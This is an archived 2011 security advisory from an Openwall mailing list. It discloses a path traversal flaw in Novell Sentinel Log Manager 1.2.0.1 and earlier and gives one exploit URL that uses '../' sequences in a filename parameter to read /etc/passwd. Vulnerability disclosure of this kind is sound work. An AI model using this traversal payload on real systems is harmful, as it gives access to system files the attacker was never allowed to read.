lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAP-1Xubm7C1EsEQiPKe37DqHc41v3d8xs065sGreO99R=D3VNg@mail.gmail.com>
Date: Sun, 18 Dec 2011 16:25:14 +0100
From: Andrea Fabrizi <andrea.fabrizi@...il.com>
To: websecurity@...appsec.org, bugtraq@...urityfocus.com,
  webappsec@...urityfocus.com, full-disclosure@...ts.grok.org.uk
Subject: Novell Sentinel Log Manager <=1.2.0.1 Path Traversal

**************************************************************
Vuln: Path Traversal
Application: Sentinel Log Manager
Vendor: Novell
Version affected: <= 1.2.0.1
Website: http://www.novell.com/products/sentinel-log-manager/
Discovered By: Andrea Fabrizi
Email: andrea.fabrizi@...il.com
Web: http://www.andreafabrizi.it
**************************************************************

The latest version of Sentinel Log Manager is prone to a Directory
Traversal, which makes it possible, for Authenticated Users, to access
any system file.

Testing environment: Sentinel Log Manager Appliance 1.2.0.1

Vulnerable URL:
/novelllogmanager/FileDownload?filename=/opt/novell/sentinel_log_mgr/3rdparty/tomcat/temp/../../../../../../etc/passwd

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ